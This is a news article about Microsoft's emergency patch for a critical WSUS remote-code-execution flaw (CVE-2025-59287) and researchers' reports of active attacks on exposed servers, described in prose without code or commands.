WSUS Vulnerability: Attacks Already Observed
Microsoft released emergency updates on Friday morning for a WSUS security vulnerability. It is now being attacked on the internet.
(Image: Skorzewiak/Shutterstock.com)
Microsoft released emergency patches out of the ordinary on Friday morning this week, closing a critical security vulnerability in WSUS services. IT security researchers have observed the first attacks on the vulnerability. IT managers should apply the update at this point at the latest.
IT security researcher Kevin Beaumont has been "playing around" with the vulnerability and concludes that it can be exploited very easily. It was apparently easy to inject malicious code through the vulnerability. Furthermore, existing research can be built upon to distribute maliciously manipulated update packages with malicious code via the compromised WSUS in the network, he writes on Mastodon.
Attacks on Security Vulnerability Observed
The IT researchers from Huntress have meanwhile already observed attacks on the WSUS security vulnerability on the internet. The attacked WSUS services have made TCP ports 5830 and 5831 accessible on the internet. "The attackers used exposed WSUS endpoints to send specially crafted requests (multiple POST calls to WSUS web services) that triggered a deserialization RCE [Remote Code Execution] against the update service," they write in their analysis.
They further discuss that a Base64-encoded script in PowerShell was decoded and executed. The script searches servers for sensitive network and user information and transmits the results to a remote webhook. The attackers also used proxy networks to carry out and conceal their attacks, explain the Huntress researchers.
Videos by heise
The analysis also lists some Indicators of Compromise (IOCs) that admins can use to check whether the systems they manage have already been targeted by cybercriminals. These include some conspicuous entries in the weblogs and WSUS logs for software distribution.
On Friday morning, Microsoft announced the distribution of emergency updates for WSUS services announced. The specific description is: "Deserializing untrusted data in Windows Server Update Service allows an unauthenticated attacker to execute code over a network" (CVE-2025-59287, CVSS 9.8, Risk "critical"). The security advisory from Microsoft is currently updated more frequently. Microsoft also now provides stand-alone updates for servers that use hotpatching, for example. However, after installation, these require a restart if they offer WSUS services.
(dmk)
